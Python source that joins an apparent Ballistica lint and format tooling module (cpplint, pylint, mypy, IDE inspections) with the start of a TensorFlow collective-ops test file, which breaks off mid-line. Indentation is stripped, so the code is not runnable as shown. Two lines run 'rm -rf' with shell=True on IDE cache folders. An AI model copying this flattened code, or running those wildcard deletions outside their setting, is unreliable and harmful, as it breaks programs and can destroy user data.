cachepath = Path(projroot, '.cache/format_clang_format')
if full and cachepath.exists():
cachepath.unlink()
cache = FileCache(cachepath)
cfconfig = Path(projroot, '.clang-format')
filenames = get_code_filenames(projroot)
confighash = get_files_hash([cfconfig])
cache.update(filenames, confighash)
dirtyfiles = cache.get_dirty_files()
def format_file(filename: str) -> Dict[str, Any]:
start_time = time.time()
# Note: seems os.system does not unlock the gil;
# make sure to use subprocess.
result = subprocess.call(['clang-format', '-i', filename])
if result != 0:
raise Exception(f'Formatting failed for {filename}')
duration = time.time() - start_time
print(f'Formatted {filename} in {duration:.2f} seconds.')
sys.stdout.flush()
return {'f': filename, 't': duration}
with concurrent.futures.ThreadPoolExecutor(
max_workers=cpu_count()) as executor:
# Converting this to a list will propagate any errors.
list(executor.map(format_file, dirtyfiles))
if dirtyfiles:
# Since we changed files, need to update hashes again.
cache.update(filenames, confighash)
cache.mark_clean(filenames)
cache.write()
print(f'Formatting is up to date for {len(filenames)} code files.',
flush=True)
def check_cpplint(projroot: Path, full: bool) -> None:
"""Run cpplint on all our applicable code."""
# pylint: disable=too-many-locals, too-many-statements
import tempfile
from concurrent.futures import ThreadPoolExecutor
from multiprocessing import cpu_count
from efrotools import getconfig, PYVER
from efro.terminal import Clr
from efro.error import CleanError
os.chdir(projroot)
filenames = get_code_filenames(projroot)
for fpath in filenames:
if ' ' in fpath:
raise Exception(f'Found space in path {fpath}; unexpected.')
# Check the config for a list of ones to ignore.
code_blacklist: List[str] = getconfig(projroot).get(
'cpplint_blacklist', [])
# Just pretend blacklisted ones don't exist.
filenames = [f for f in filenames if f not in code_blacklist]
filenames = [f for f in filenames if not f.endswith('.mm')]
cachepath = Path(projroot, '.cache/check_cpplint')
if full and cachepath.exists():
cachepath.unlink()
cache = FileCache(cachepath)
# Clear out entries and hashes for files that have changed/etc.
cache.update(filenames, '')
dirtyfiles = cache.get_dirty_files()
if dirtyfiles:
print(f'{Clr.BLU}CppLint checking'
f' {len(dirtyfiles)} file(s)...{Clr.RST}')
# We want to do a few custom modifications to the cpplint module...
try:
import cpplint as cpplintmodule
except Exception as exc:
raise CleanError('Unable to import cpplint.') from exc
with open(cpplintmodule.__file__) as infile:
codelines = infile.read().splitlines()
cheadersline = codelines.index('_C_HEADERS = frozenset([')
# Extra headers we consider as valid C system headers.
c_headers = [
'malloc.h', 'tchar.h', 'jni.h', 'android/log.h', 'EGL/egl.h',
'libgen.h', 'linux/netlink.h', 'linux/rtnetlink.h', 'android/bitmap.h',
'android/log.h', 'uuid/uuid.h', 'cxxabi.h', 'direct.h', 'shellapi.h',
'rpc.h', 'io.h'
]
codelines.insert(cheadersline + 1, ''.join(f"'{h}'," for h in c_headers))
# Skip unapproved C++ headers check (it flags <mutex>, <thread>, etc.)
headercheckline = codelines.index(
" if include and include.group(1) in ('cfenv',")
codelines[headercheckline] = (
" if False and include and include.group(1) in ('cfenv',")
# Skip copyright line check (our public repo code is MIT licensed
# so not crucial to keep track of who wrote exactly what)
copyrightline = codelines.index(
' """Logs an error if no Copyright'
' message appears at the top of the file."""')
codelines[copyrightline] = ' return'
# Don't complain about unknown NOLINT categories.
# (we use them for clang-tidy)
unknownlintline = codelines.index(
' elif category not in _LEGACY_ERROR_CATEGORIES:')
codelines[unknownlintline] = ' elif False:'
def lint_file(filename: str) -> None:
result = subprocess.call(
[f'python{PYVER}', '-m', 'cpplint', '--root=src', filename],
env=env)
if result != 0:
raise CleanError(
f'{Clr.RED}Cpplint failed for {filename}.{Clr.RST}')
with tempfile.TemporaryDirectory() as tmpdir:
# Write our replacement module, make it discoverable, then run.
with open(tmpdir + '/cpplint.py', 'w') as outfile:
outfile.write('\n'.join(codelines))
env = os.environ.copy()
env['PYTHONPATH'] = tmpdir
with ThreadPoolExecutor(max_workers=cpu_count()) as executor:
# Converting this to a list will propagate any errors.
list(executor.map(lint_file, dirtyfiles))
if dirtyfiles:
cache.mark_clean(filenames)
cache.write()
print(
f'{Clr.GRN}CppLint: all {len(filenames)} files are passing.{Clr.RST}',
flush=True)
def get_code_filenames(projroot: Path) -> List[str]:
"""Return the list of files to lint-check or auto-formatting."""
from efrotools import getconfig
exts = ('.h', '.c', '.cc', '.cpp', '.cxx', '.m', '.mm')
places = getconfig(projroot).get('code_source_dirs', None)
if places is None:
raise RuntimeError('code_source_dirs not declared in config')
codefilenames = []
for place in places:
for root, _dirs, files in os.walk(place):
for fname in files:
if any(fname.endswith(ext) for ext in exts):
codefilenames.append(os.path.join(root, fname))
codefilenames.sort()
return codefilenames
def format_yapf(projroot: Path, full: bool) -> None:
"""Runs yapf on all of our Python code."""
import time
from concurrent.futures import ThreadPoolExecutor
from multiprocessing import cpu_count
from efrotools import get_files_hash, PYVER
os.chdir(projroot)
cachepath = Path(projroot, '.cache/format_yapf')
if full and cachepath.exists():
cachepath.unlink()
cache = FileCache(cachepath)
yapfconfig = Path(projroot, '.style.yapf')
filenames = get_script_filenames(projroot)
confighash = get_files_hash([yapfconfig])
cache.update(filenames, confighash)
dirtyfiles = cache.get_dirty_files()
def format_file(filename: str) -> None:
start_time = time.time()
result = subprocess.call(
[f'python{PYVER}', '-m', 'yapf', '--in-place', filename])
if result != 0:
raise Exception(f'Formatting failed for {filename}')
duration = time.time() - start_time
print(f'Formatted {filename} in {duration:.2f} seconds.')
sys.stdout.flush()
with ThreadPoolExecutor(max_workers=cpu_count()) as executor:
# Convert the futures to a list to propagate any errors even
# though there are no return values we use.
list(executor.map(format_file, dirtyfiles))
if dirtyfiles:
# Since we changed files, need to update hashes again.
cache.update(filenames, confighash)
cache.mark_clean(filenames)
cache.write()
print(f'Formatting is up to date for {len(filenames)} script files.',
flush=True)
def _should_include_script(fnamefull: str) -> bool:
fname = os.path.basename(fnamefull)
if fname.endswith('.py'):
return True
# Look for 'binary' scripts with no extensions too.
if not fname.startswith('.') and '.' not in fname:
try:
with open(fnamefull) as infile:
line = infile.readline()
if '/usr/bin/env python' in line or '/usr/bin/python' in line:
return True
except UnicodeDecodeError:
# Actual binary files will probably kick back this error.
pass
return False
def get_script_filenames(projroot: Path) -> List[str]:
"""Return the Python filenames to lint-check or auto-format."""
from efrotools import getconfig
filenames = set()
places = getconfig(projroot).get('python_source_dirs', None)
if places is None:
raise RuntimeError('python_source_dirs not declared in config')
for place in places:
for root, _dirs, files in os.walk(place):
for fname in files:
fnamefull = os.path.join(root, fname)
# Skip symlinks (we conceivably operate on the original too)
if os.path.islink(fnamefull):
continue
if _should_include_script(fnamefull):
filenames.add(fnamefull)
return sorted(list(f for f in filenames if 'flycheck_' not in f))
def runpylint(projroot: Path, filenames: List[str]) -> None:
"""Run Pylint explicitly on files."""
pylintrc = Path(projroot, '.pylintrc')
if not os.path.isfile(pylintrc):
raise Exception('pylintrc not found where expected')
# Technically we could just run pylint standalone via command line here,
# but let's go ahead and run it inline so we're consistent with our cached
# full-project version.
_run_pylint(projroot,
pylintrc,
cache=None,
dirtyfiles=filenames,
allfiles=None)
def pylint(projroot: Path, full: bool, fast: bool) -> None:
"""Run Pylint on all scripts in our project (with smart dep tracking)."""
from efrotools import get_files_hash
from efro.terminal import Clr
pylintrc = Path(projroot, '.pylintrc')
if not os.path.isfile(pylintrc):
raise Exception('pylintrc not found where expected')
filenames = get_script_filenames(projroot)
if any(' ' in name for name in filenames):
raise Exception('found space in path; unexpected')
script_blacklist: List[str] = []
filenames = [f for f in filenames if f not in script_blacklist]
cachebasename = 'check_pylint_fast' if fast else 'check_pylint'
cachepath = Path(projroot, '.cache', cachebasename)
if full and cachepath.exists():
cachepath.unlink()
cache = FileCache(cachepath)
# Clear out entries and hashes for files that have changed/etc.
cache.update(filenames, get_files_hash([pylintrc]))
# Do a recursive dependency check and mark all files who are
# either dirty or have a dependency that is dirty.
filestates: Dict[str, bool] = {}
for fname in filenames:
_dirty_dep_check(fname, filestates, cache, fast, 0)
dirtyfiles = [k for k, v in filestates.items() if v]
# Let's sort by modification time, so ones we're actively trying
# to fix get linted first and we see remaining errors faster.
dirtyfiles.sort(reverse=True, key=lambda f: os.stat(f).st_mtime)
if dirtyfiles:
print(
f'{Clr.BLU}Pylint checking {len(dirtyfiles)} file(s)...{Clr.RST}',
flush=True)
try:
_run_pylint(projroot, pylintrc, cache, dirtyfiles, filenames)
finally:
# No matter what happens, we still want to
# update our disk cache (since some lints may have passed).
cache.write()
print(f'{Clr.GRN}Pylint: all {len(filenames)} files are passing.{Clr.RST}',
flush=True)
cache.write()
def _dirty_dep_check(fname: str, filestates: Dict[str, bool], cache: FileCache,
fast: bool, recursion: int) -> bool:
"""Recursively check a file's deps and return whether it is dirty."""
# pylint: disable=too-many-branches
if not fast:
# Check for existing dirty state (only applies in non-fast where
# we recurse infinitely).
curstate = filestates.get(fname)
if curstate is not None:
return curstate
# Ok; there's no current state for this file.
# First lets immediately mark it as clean so if a dependency of ours
# queries it we won't loop infinitely. (If we're actually dirty that
# will be reflected properly once we're done).
if not fast:
filestates[fname] = False
# If this dependency has disappeared, consider that dirty.
if fname not in cache.entries:
dirty = True
else:
cacheentry = cache.entries[fname]
# See if we ourself are dirty
if 'hash' not in cacheentry:
dirty = True
else:
# Ok we're clean; now check our dependencies..
dirty = False
# Only increment recursion in fast mode, and
# skip dependencies if we're pass the recursion limit.
recursion2 = recursion
if fast:
# Our one exception is top level ba which basically aggregates.
if not fname.endswith('/ba/__init__.py'):
recursion2 += 1
if recursion2 <= 1:
deps = cacheentry.get('deps', [])
for dep in deps:
# If we have a dep that no longer exists, WE are dirty.
if not os.path.exists(dep):
dirty = True
break
if _dirty_dep_check(dep, filestates, cache, fast,
recursion2):
dirty = True
break
# Cache and return our dirty state..
# Note: for fast mode we limit to recursion==0 so we only write when
# the file itself is being directly visited.
if recursion == 0:
filestates[fname] = dirty
return dirty
def _run_pylint(projroot: Path, pylintrc: Union[Path, str],
cache: Optional[FileCache], dirtyfiles: List[str],
allfiles: Optional[List[str]]) -> Dict[str, Any]:
import time
from pylint import lint
from efro.error import CleanError
from efro.terminal import Clr
start_time = time.time()
args = ['--rcfile', str(pylintrc), '--output-format=colorized']
args += dirtyfiles
name = f'{len(dirtyfiles)} file(s)'
run = lint.Run(args, do_exit=False)
if cache is not None:
assert allfiles is not None
result = _apply_pylint_run_to_cache(projroot, run, dirtyfiles,
allfiles, cache)
if result != 0:
raise CleanError(f'Pylint failed for {result} file(s).')
# Sanity check: when the linter fails we should always be failing too.
# If not, it means we're probably missing something and incorrectly
# marking a failed file as clean.
if run.linter.msg_status != 0 and result == 0:
raise RuntimeError('Pylint linter returned non-zero result'
' but we did not; this is probably a bug.')
else:
if run.linter.msg_status != 0:
raise CleanError('Pylint failed.')
duration = time.time() - start_time
print(f'{Clr.GRN}Pylint passed for {name}'
f' in {duration:.1f} seconds.{Clr.RST}')
sys.stdout.flush()
return {'f': dirtyfiles, 't': duration}
def _apply_pylint_run_to_cache(projroot: Path, run: Any, dirtyfiles: List[str],
allfiles: List[str], cache: FileCache) -> int:
# pylint: disable=too-many-locals
# pylint: disable=too-many-branches
# pylint: disable=too-many-statements
from astroid import modutils
from efrotools import getconfig
from efro.error import CleanError
# First off, build a map of dirtyfiles to module names
# (and the corresponding reverse map).
paths_to_names: Dict[str, str] = {}
names_to_paths: Dict[str, str] = {}
for fname in allfiles:
try:
mpath = modutils.modpath_from_file(fname)
mpath = _filter_module_name('.'.join(mpath))
paths_to_names[fname] = mpath
except ImportError:
# This probably means its a tool or something not in our
# standard path. In this case just use its base name.
# (seems to be what pylint does)
dummyname = os.path.splitext(os.path.basename(fname))[0]
paths_to_names[fname] = dummyname
for key, val in paths_to_names.items():
names_to_paths[val] = key
# If there's any cyclic-import errors, just mark all deps as dirty;
# don't want to add the logic to figure out which ones the cycles cover
# since they all seems to appear as errors for the last file in the list.
cycles: int = run.linter.stats.get('by_msg', {}).get('cyclic-import', 0)
have_dep_cycles: bool = cycles > 0
if have_dep_cycles:
print(f'Found {cycles} cycle-errors; keeping all dirty files dirty.')
# Update dependencies for what we just ran.
# A run leaves us with a map of modules to a list of the modules that
# imports them. We want the opposite though: for each of our modules
# we want a list of the modules it imports.
reversedeps = {}
# Make sure these are all proper module names; no foo.bar.__init__ stuff.
for key, val in run.linter.stats['dependencies'].items():
sval = [_filter_module_name(m) for m in val]
reversedeps[_filter_module_name(key)] = sval
deps: Dict[str, Set[str]] = {}
untracked_deps = set()
for mname, mallimportedby in reversedeps.items():
for mimportedby in mallimportedby:
if mname in names_to_paths:
deps.setdefault(mimportedby, set()).add(mname)
else:
untracked_deps.add(mname)
ignored_untracked_deps: List[str] = getconfig(projroot).get(
'pylint_ignored_untracked_deps', [])
# Add a few that this package itself triggers.
ignored_untracked_deps += ['pylint.lint', 'astroid.modutils', 'astroid']
# Ignore some specific untracked deps; complain about any others.
untracked_deps = set(dep for dep in untracked_deps
if dep not in ignored_untracked_deps)
if untracked_deps:
raise CleanError(
f'Pylint found untracked dependencies: {untracked_deps}.'
' If these are external to your project, add them to'
' "pylint_ignored_untracked_deps" in the project config.')
# Finally add the dependency lists to our entries (operate on
# everything in the run; it may not be mentioned in deps).
no_deps_modules = set()
for fname in dirtyfiles:
fmod = paths_to_names[fname]
if fmod not in deps:
# Since this code is a bit flaky, lets always announce when we
# come up empty and keep a whitelist of expected values to ignore.
no_deps_modules.add(fmod)
depsval: List[str] = []
else:
# Our deps here are module names; store paths.
depsval = [names_to_paths[dep] for dep in deps[fmod]]
cache.entries[fname]['deps'] = depsval
# Let's print a list of modules with no detected deps so we can make sure
# this is behaving.
if no_deps_modules:
if bool(False):
print('NOTE: no dependencies found for:',
', '.join(no_deps_modules))
# Ok, now go through all dirtyfiles involved in this run.
# Mark them as either errored or clean depending on whether there's
# error info for them in the run stats.
# Once again need to convert any foo.bar.__init__ to foo.bar.
stats_by_module: Dict[str, Any] = {
_filter_module_name(key): val
for key, val in run.linter.stats['by_module'].items()
}
errcount = 0
for fname in dirtyfiles:
mname2 = paths_to_names.get(fname)
if mname2 is None:
raise Exception('unable to get module name for "' + fname + '"')
counts = stats_by_module.get(mname2)
# 'statement' count seems to be new and always non-zero; ignore it
if counts is not None:
counts = {c: v for c, v in counts.items() if c != 'statement'}
if (counts is not None and any(counts.values())) or have_dep_cycles:
# print('GOT FAIL FOR', fname, counts)
if 'hash' in cache.entries[fname]:
del cache.entries[fname]['hash']
errcount += 1
else:
# print('MARKING FILE CLEAN', mname2, fname)
cache.entries[fname]['hash'] = (cache.curhashes[fname])
return errcount
def _filter_module_name(mpath: str) -> str:
"""Filter weird module paths such as 'foo.bar.__init__' to 'foo.bar'."""
# Seems Pylint returns module paths with __init__ on the end in some cases
# and not in others. Could dig into it, but for now just filtering them
# out...
return mpath[:-9] if mpath.endswith('.__init__') else mpath
def runmypy(projroot: Path,
filenames: List[str],
full: bool = False,
check: bool = True) -> None:
"""Run MyPy on provided filenames."""
from efrotools import PYTHON_BIN
args = [
PYTHON_BIN, '-m', 'mypy', '--pretty', '--no-error-summary',
'--config-file',
str(Path(projroot, '.mypy.ini'))
] + filenames
if full:
args.insert(args.index('mypy') + 1, '--no-incremental')
subprocess.run(args, check=check)
def mypy(projroot: Path, full: bool) -> None:
"""Type check all of our scripts using mypy."""
import time
from efro.terminal import Clr
from efro.error import CleanError
filenames = get_script_filenames(projroot)
desc = '(full)' if full else '(incremental)'
print(f'{Clr.BLU}Running Mypy {desc}...{Clr.RST}', flush=True)
starttime = time.time()
try:
runmypy(projroot, filenames, full)
except Exception as exc:
raise CleanError('Mypy failed.') from exc
duration = time.time() - starttime
print(f'{Clr.GRN}Mypy passed in {duration:.1f} seconds.{Clr.RST}',
flush=True)
def dmypy(projroot: Path) -> None:
"""Type check all of our scripts using mypy in daemon mode."""
import time
from efro.terminal import Clr
from efro.error import CleanError
filenames = get_script_filenames(projroot)
# Special case; explicitly kill the daemon.
if '-stop' in sys.argv:
subprocess.run(['dmypy', 'stop'], check=False)
return
print('Running Mypy (daemon)...', flush=True)
starttime = time.time()
try:
args = [
'dmypy', 'run', '--timeout', '3600', '--', '--config-file',
'.mypy.ini', '--pretty'
] + filenames
subprocess.run(args, check=True)
except Exception as exc:
raise CleanError('Mypy daemon: fail.') from exc
duration = time.time() - starttime
print(f'{Clr.GRN}Mypy daemon passed in {duration:.1f} seconds.{Clr.RST}',
flush=True)
def _parse_idea_results(path: Path) -> int:
"""Print errors found in an idea inspection xml file.
Returns the number of errors found.
"""
import xml.etree.ElementTree as Et
error_count = 0
root = Et.parse(str(path)).getroot()
for child in root:
line: Optional[str] = None
description: Optional[str] = None
fname: Optional[str] = None
if child.tag == 'problem':
is_error = True
for pchild in child:
if pchild.tag == 'problem_class':
# We still report typos but we don't fail the
# check due to them (that just gets tedious).
if pchild.text == 'Typo':
is_error = False
if pchild.tag == 'line':
line = pchild.text
if pchild.tag == 'description':
description = pchild.text
if pchild.tag == 'file':
fname = pchild.text
if isinstance(fname, str):
fname = fname.replace('file://$PROJECT_DIR$/', '')
print(f'{fname}:{line}: {description}')
if is_error:
error_count += 1
return error_count
def _run_idea_inspections(projroot: Path,
scripts: List[str],
displayname: str,
inspect: Path,
verbose: bool,
inspectdir: Path = None) -> None:
"""Actually run idea inspections.
Throw an Exception if anything is found or goes wrong.
"""
# pylint: disable=too-many-locals
import tempfile
import time
import datetime
from efro.error import CleanError
from efro.terminal import Clr
start_time = time.time()
print(
f'{Clr.BLU}{displayname} checking'
f' {len(scripts)} file(s)...{Clr.RST}',
flush=True)
tmpdir = tempfile.TemporaryDirectory()
iprof = Path(projroot, '.idea/inspectionProfiles/Default.xml')
if not iprof.exists():
iprof = Path(projroot, '.idea/inspectionProfiles/Project_Default.xml')
if not iprof.exists():
raise Exception('No default inspection profile found.')
cmd = [str(inspect), str(projroot), str(iprof), tmpdir.name, '-v2']
if inspectdir is not None:
cmd += ['-d', str(inspectdir)]
running = True
def heartbeat() -> None:
"""Print the time occasionally to make the log more informative."""
while running:
time.sleep(60)
print('Heartbeat', datetime.datetime.now(), flush=True)
if verbose:
import threading
print(cmd, flush=True)
threading.Thread(target=heartbeat, daemon=True).start()
result = subprocess.run(cmd, capture_output=not verbose, check=False)
running = False
if result.returncode != 0:
# In verbose mode this stuff got printed already.
if not verbose:
stdout = (
result.stdout.decode() if isinstance( # type: ignore
result.stdout, bytes) else str(result.stdout))
stderr = (
result.stderr.decode() if isinstance( # type: ignore
result.stdout, bytes) else str(result.stdout))
print(f'{displayname} inspection failure stdout:\n{stdout}' +
f'{displayname} inspection failure stderr:\n{stderr}')
raise RuntimeError(f'{displayname} inspection failed.')
files = [f for f in os.listdir(tmpdir.name) if not f.startswith('.')]
total_errors = 0
if files:
for fname in files:
total_errors += _parse_idea_results(Path(tmpdir.name, fname))
if total_errors > 0:
raise CleanError(f'{Clr.SRED}{displayname} inspection'
f' found {total_errors} error(s).{Clr.RST}')
duration = time.time() - start_time
print(
f'{Clr.GRN}{displayname} passed for {len(scripts)} files'
f' in {duration:.1f} seconds.{Clr.RST}',
flush=True)
def _run_idea_inspections_cached(cachepath: Path,
filenames: List[str],
full: bool,
projroot: Path,
displayname: str,
inspect: Path,
verbose: bool,
inspectdir: Path = None) -> None:
# pylint: disable=too-many-locals
import hashlib
import json
from efro.terminal import Clr
md5 = hashlib.md5()
# Let's calc a single hash from the contents of all script files and only
# run checks when that changes. Sadly there's not much else optimization
# wise that we can easily do, but this will at least prevent re-checks when
# nothing at all has changed.
for filename in filenames:
with open(filename, 'rb') as infile:
md5.update(infile.read())
# Also hash a few .idea files so we re-run inspections when they change.
extra_hash_paths = [
Path(projroot, '.idea/inspectionProfiles/Default.xml'),
Path(projroot, '.idea/inspectionProfiles/Project_Default.xml'),
Path(projroot, '.idea/dictionaries/ericf.xml')
]
for epath in extra_hash_paths:
if os.path.exists(epath):
with open(epath, 'rb') as infile:
md5.update(infile.read())
current_hash = md5.hexdigest()
existing_hash: Optional[str]
try:
with open(cachepath) as infile2:
existing_hash = json.loads(infile2.read())['hash']
except Exception:
existing_hash = None
if full or current_hash != existing_hash:
_run_idea_inspections(projroot,
filenames,
displayname,
inspect=inspect,
verbose=verbose,
inspectdir=inspectdir)
cachepath.parent.mkdir(parents=True, exist_ok=True)
with open(cachepath, 'w') as outfile:
outfile.write(json.dumps({'hash': current_hash}))
print(
f'{Clr.GRN}{displayname}: all {len(filenames)}'
f' files are passing.{Clr.RST}',
flush=True)
def check_pycharm(projroot: Path, full: bool, verbose: bool) -> None:
"""Run pycharm inspections on all our scripts."""
import time
# FIXME: Generalize this to work with at least linux, possibly windows.
cachepath = Path('.cache/check_pycharm')
filenames = get_script_filenames(projroot)
pycharmroot = Path('/Applications/PyCharm CE.app')
pycharmbin = Path(pycharmroot, 'Contents/MacOS/pycharm')
inspect = Path(pycharmroot, 'Contents/bin/inspect.sh')
# In full mode, clear out pycharm's caches first.
# It seems we need to spin up the GUI and give it a bit to
# re-cache system python for this to work...
# UPDATE: This really slows things down, so we now only do it in
# very specific cases where time isn't important.
# (such as our daily full-test-runs)
# UPDATE 2: Looks like we might no longer need to do the GUI spin-up bit.
# If we can be certain of this, we can go back to simply blowing away
# the cache for 'full' mode checks without the env var.
if full and os.environ.get('EFROTOOLS_FULL_PYCHARM_RECACHE') == '1':
print('Clearing PyCharm caches...', flush=True)
subprocess.run('rm -rf ~/Library/Caches/JetBrains/PyCharmCE*',
shell=True,
check=True)
# Hoping this isn't necessary anymore. Need to rework this if it is,
# since it now gets run through ssh and gui stuff doesn't seem to
# work that way.
if bool(False):
print('Launching GUI PyCharm to rebuild caches...', flush=True)
process = subprocess.Popen(str(pycharmbin))
# Wait a bit and ask it nicely to die.
# We need to make sure it has enough time to do its cache updating
# thing even if the system is fully under load.
time.sleep(5 * 60)
# Seems killing it via applescript is more likely to leave it
# in a working state for offline inspections than TERM signal..
subprocess.run(
"osascript -e 'tell application \"PyCharm CE\" to quit'",
shell=True,
check=False)
# process.terminate()
print('Waiting for GUI PyCharm to quit...', flush=True)
process.wait()
_run_idea_inspections_cached(cachepath=cachepath,
filenames=filenames,
full=full,
projroot=projroot,
displayname='PyCharm',
inspect=inspect,
verbose=verbose)
def check_clioncode(projroot: Path, full: bool, verbose: bool) -> None:
"""Run clion inspections on all our code."""
import time
cachepath = Path('.cache/check_clioncode')
filenames = get_code_filenames(projroot)
clionroot = Path('/Applications/CLion.app')
clionbin = Path(clionroot, 'Contents/MacOS/clion')
inspect = Path(clionroot, 'Contents/bin/inspect.sh')
# At the moment offline clion inspections seem a bit flaky.
# They don't seem to run at all if we haven't opened the project
# in the GUI, and it seems recent changes can get ignored for that
# reason too.
# So for now let's try blowing away caches, launching the gui
# temporarily, and then kicking off inspections after that. Sigh.
print('Clearing CLion caches...', flush=True)
subprocess.run('rm -rf ~/Library/Caches/CLion*', shell=True, check=True)
# UPDATE: seems this is unnecessary now; should double check.
# Note: I'm assuming this project needs to be open when the GUI
# comes up. Currently just have one project so can rely on auto-open
# but may need to get fancier later if that changes.
if bool(False):
print('Launching GUI CLion to rebuild caches...', flush=True)
process = subprocess.Popen(str(clionbin))
# Wait a moment and ask it nicely to die.
waittime = 120
while waittime > 0:
print(f'Waiting for {waittime} more seconds.')
time.sleep(10)
waittime -= 10
# Seems killing it via applescript is more likely to leave it
# in a working state for offline inspections than TERM signal..
subprocess.run("osascript -e 'tell application \"CLion\" to quit'",
shell=True,
check=False)
# process.terminate()
print('Waiting for GUI CLion to quit...', flush=True)
process.wait(timeout=60)
print('Launching Offline CLion to run inspections...', flush=True)
_run_idea_inspections_cached(
cachepath=cachepath,
filenames=filenames,
full=full,
projroot=Path(projroot, 'ballisticacore-cmake'),
inspectdir=Path(projroot, 'ballisticacore-cmake/src/ballistica'),
displayname='CLion',
inspect=inspect,
verbose=verbose)
def check_android_studio(projroot: Path, full: bool, verbose: bool) -> None:
"""Run Android Studio inspections on all our code."""
# import time
cachepath = Path('.cache/check_android_studio')
filenames = get_code_filenames(projroot)
clionroot = Path('/Applications/Android Studio.app')
# clionbin = Path(clionroot, 'Contents/MacOS/studio')
inspect = Path(clionroot, 'Contents/bin/inspect.sh')
# At the moment offline clion inspections seem a bit flaky.
# They don't seem to run at all if we haven't opened the project
# in the GUI, and it seems recent changes can get ignored for that
# reason too.
# So for now let's try blowing away caches, launching the gui
# temporarily, and then kicking off inspections after that. Sigh.
# print('Clearing Android Studio caches...', flush=True)
# subprocess.run('rm -rf ~/Library/Caches/AndroidStudio*',
# shell=True,
# check=True)
# Note: I'm assuming this project needs to be open when the GUI
# comes up. Currently just have one project so can rely on auto-open
# but may need to get fancier later if that changes.
# print('Launching GUI CLion to rebuild caches...', flush=True)
# process = subprocess.Popen(str(clionbin))
# Wait a moment and ask it nicely to die.
# time.sleep(120)
# Seems killing it via applescript is more likely to leave it
# in a working state for offline inspections than TERM signal..
# subprocess.run(
# "osascript -e 'tell application \"Android Studio\" to quit'",
# shell=True)
# process.terminate()
# print('Waiting for GUI CLion to quit...', flush=True)
# process.wait(timeout=60)
print('Launching Offline Android Studio to run inspections...', flush=True)
_run_idea_inspections_cached(
cachepath=cachepath,
filenames=filenames,
full=full,
projroot=Path(projroot, 'ballisticacore-android'),
inspectdir=Path(
projroot,
'ballisticacore-android/BallisticaCore/src/main/cpp/src/ballistica'
),
# inspectdir=None,
displayname='Android Studio',
inspect=inspect,
verbose=verbose)
|
collective_ops_multi_worker_test.py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for multi worker Collective Operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import os
import threading
import time
from absl.testing import parameterized
from tensorflow.core.protobuf import tensorflow_server_pb2
from tensorflow.python.distribute import cluster_resolver as cluster_resolver_lib
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import multi_process_runner
from tensorflow.python.distribute import multi_worker_test_base
from tensorflow.python.eager import context
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import collective_ops
def enable_collective_ops(cluster_resolver):
context.context().configure_collective_ops(
collective_leader="/job:worker/replica:0/task:0")
config_proto = copy.deepcopy(context.context().config)
server_def = tensorflow_server_pb2.ServerDef(
cluster=cluster_resolver.cluster_spec().as_cluster_def(),
default_session_config=config_proto,
job_name=cluster_resolver.task_type,
task_index=cluster_resolver.task_id,
protocol=cluster_resolver.rpc_layer or "grpc")
context.context().enable_collective_ops(server_def)
def enable_collective_ops_with_barrier(cluster_resolver):
multi_process_runner.get_barrier().wait()
enable_collective_ops(cluster_resolver)
multi_process_runner.get_barrier().wait()
device_combination = (
combinations.combine(device="CPU", communication="RING", required_gpus=0) +
combinations.combine(
device="GPU", communication=["RING", "NCCL"], required_gpus=1))
class CollectiveOpTest(test.TestCase):
def testCheckHealth(self):
def worker_fn():
enable_collective_ops(cluster_resolver_lib.TFConfigClusterResolver())
# There may be some delays before the server startup. Check health should
# eventually be OK.
while True:
try:
for task in [
"/job:worker/replica:0/task:0",
"/job:worker/replica:0/task:1",
]:
context.context().check_collective_ops_peer_health(
task, timeout_in_ms=1000)
except (errors.UnavailableError, errors.DeadlineExceededError):
continue
break
multi_process_runner.get_barrier().wait()
cluster_spec = multi_worker_test_base.create_cluster_spec(num_workers=2)
mpr = multi_process_runner.MultiProcessRunner(worker_fn, cluster_spec)
mpr.start()
mpr.join()
def testCheckHealthPeerDown(self):
def worker_fn():
enable_collective_ops(cluster_resolver_lib.TFConfigClusterResolver())
context.context().check_collective_ops_peer_health(
"/job:worker/replica:0/task:1", timeout_in_ms=1000)
cluster_spec = multi_worker_test_base.create_cluster_spec(num_workers=2)
mpr = multi_process_runner.MultiProcessRunner(worker_fn, cluster_spec)
mpr.start_single_process("worker", 0)
with self.assertRaises(
(errors.UnavailableError, errors.DeadlineExceededError)):
mpr.join()
def testCheckHealthPeerRestart(self):
def worker_fn():
cluster_resolver = cluster_resolver_lib.TFConfigClusterResolver()
enable_collective_ops(cluster_resolver)
collective_ops.all_reduce(
constant_op.constant(1.),
group_size=2,
group_key=100,
instance_key=100,
merge_op="Add",
final_op="Id",
communication_hint="ring")
if cluster_resolver.task_type == "worker":
# MultiProcessRunner will auto restart worker-0.
os._exit(1) # pylint: disable=protected-access
else:
# chief should eventually gets FailedPreconditionError after worker-0
# has restarted.
while True:
time.sleep(1)
try:
context.context().check_collective_ops_peer_health(
"/job:worker/replica:0/task:0", timeout_in_ms=1000)
except errors.UnavailableError:
pass
except errors.FailedPreconditionError:
break
cluster_spec = multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=1)
mpr = multi_process_runner.MultiProcessRunner(
worker_fn, cluster_spec, auto_restart=True)
mpr.start()
mpr.join()
def testCheckHealthInvalidPeer(self):
def worker_fn():
enable_collective_ops(cluster_resolver_lib.TFConfigClusterResolver())
context.context().check_collective_ops_peer_health(
"localhost:12345", timeout_in_ms=1000)
cluster_spec = multi_worker_test_base.create_cluster_spec(num_workers=2)
mpr = multi_process_runner.MultiProcessRunner(worker_fn, cluster_spec)
mpr.start_single_process("worker", 0)
with self.assertRaises(errors.InvalidArgumentError):
mpr.join()
two_worker_pool_runner = multi_process_runner.MultiProcessPoolRunner(
multi_worker_test_base.create_cluster_spec(num_workers=2),
initializer=lambda: enable_collective_ops(cluster_resolver_lib.
